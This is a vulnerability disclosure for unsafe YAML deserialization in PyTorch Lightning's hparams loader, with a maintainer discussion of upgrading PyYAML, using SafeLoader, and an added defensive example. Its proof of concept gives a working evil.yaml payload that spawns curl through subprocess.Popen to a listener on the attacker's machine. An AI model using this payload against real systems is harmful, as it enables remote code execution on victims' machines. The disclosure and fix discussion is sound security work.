Deserialization of Untrusted Data in pytorchlightning/pytorch-lightning
Reported on
Dec 12th 2021
Description
There is an untrusted YAML deserialization vulnerability in the PyTorchLightning GitHub repository. The load_hparams_from_yaml function in PyTorchLightning's saving.py (core.saving.load_hparams_from_yaml) loads YAML with "yaml.UnsafeLoader" from the PyYAML Python library, which is not a secure method. Because of that, a maliciously crafted YAML config file can cause code execution on the victim's machine.
Proof of Concept
- Here is the poc.py file:
from pytorch_lightning import core
core.saving.load_hparams_from_yaml("evil.yaml")
- Here is the evil.yaml file:
- !!python/object/new:yaml.MappingNode
  listitems: !!str '!!python/object/apply:subprocess.Popen [["curl", "127.0.0.1:8080/rce"]]'
  state:
    tag: !!str dummy
    value: !!str dummy
    extend: !!python/name:yaml.unsafe_load
- After that, you need to start an HTTP server on port 8080 of your attacker machine. When you run the command below, you will see the HTTP request from the victim host caused by the malicious YAML file.
python3 -m http.server 8080
- Run the poc.py file; after that you will see an HTTP request coming from the victim host:
python3 poc.py
Impact
A maliciously crafted YAML config file can cause code execution on the victim's machine.
Occurrences
References
As mentioned in the reference link, is the fix just updating https://github.com/PyTorchLightning/pytorch-lightning/blob/7aee00c679d64ed62c0e119415ac3e02a0e434fb/requirements.txt#L7 to >=5.3.1?
Actually, I don't have very deep knowledge about the pyyaml library, but I would recommend you to update the library to the latest version rather than the 5.3.1 version because as you can see from this link, it is said that there may be some problems in the 5.3.1 version. In addition, the use of UnsafeLoader may also open the door to different deserialization vulnerabilities in the future. For this reason, I can recommend you to examine other pyyaml loader functions such as FullLoader and SafeLoader. As the name suggests, if your application will not cause any incompatibility problems, using "yaml.SafeLoader" after updating the pyyaml library seems like the most guaranteed solution.
Another reference about this subject: https://blog.ankursundara.com/pyyaml-cve/
Okay, thank you! Do you want to open a PR so you get the fix bounty?
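An added example, not part of the original report or the project's code: one way to apply the yaml.SafeLoader recommendation from the discussion above when reading an hparams file, with a text scan for Python-specific tags as a triage step for files already on disk. The function names and both sample documents are hypothetical and constructed for illustration.

```python
import re

# PyYAML's Python-specific tags, in shorthand (!!python/...) or full URI form.
PYTHON_TAG = re.compile(r"(?:!!|tag:yaml\.org,2002:)python/[\w/.:]*")

# Constructed sample: a benign hparams file.
BENIGN = "learning_rate: 0.001\nbatch_size: 32\noptimizer: adam\n"

# Constructed sample: Python-specific tags that reference only harmless builtins.
TAGGED = "layers: !!python/tuple [64, 32]\nfn: !!python/name:builtins.len\n"


def find_python_tags(text):
    """Triage scan: list the Python-specific YAML tags present in raw text."""
    return sorted(set(PYTHON_TAG.findall(text)))


def load_hparams_safely(text):
    """Parse hparams with SafeLoader and accept only a top-level mapping."""
    import yaml  # PyYAML; imported here so the scan above runs without it

    try:
        data = yaml.load(text, Loader=yaml.SafeLoader)
    except yaml.YAMLError as exc:
        # SafeLoader has no constructor for python/* tags, so it raises
        # instead of building objects or calling anything.
        raise ValueError(f"rejected hparams YAML: {exc}") from exc
    if data is None:  # empty file
        return {}
    if not isinstance(data, dict):
        raise ValueError("hparams YAML must be a mapping at the top level")
    return data


if __name__ == "__main__":
    for name, doc in (("benign", BENIGN), ("tagged", TAGGED)):
        print(name, "tags:", find_python_tags(doc))
        try:
            print(name, "loaded:", load_hparams_safely(doc))
        except ValueError as err:
            print(name, "refused:", err)
```

The text scan is only a triage aid for auditing stored files; SafeLoader is the control that actually refuses the tags.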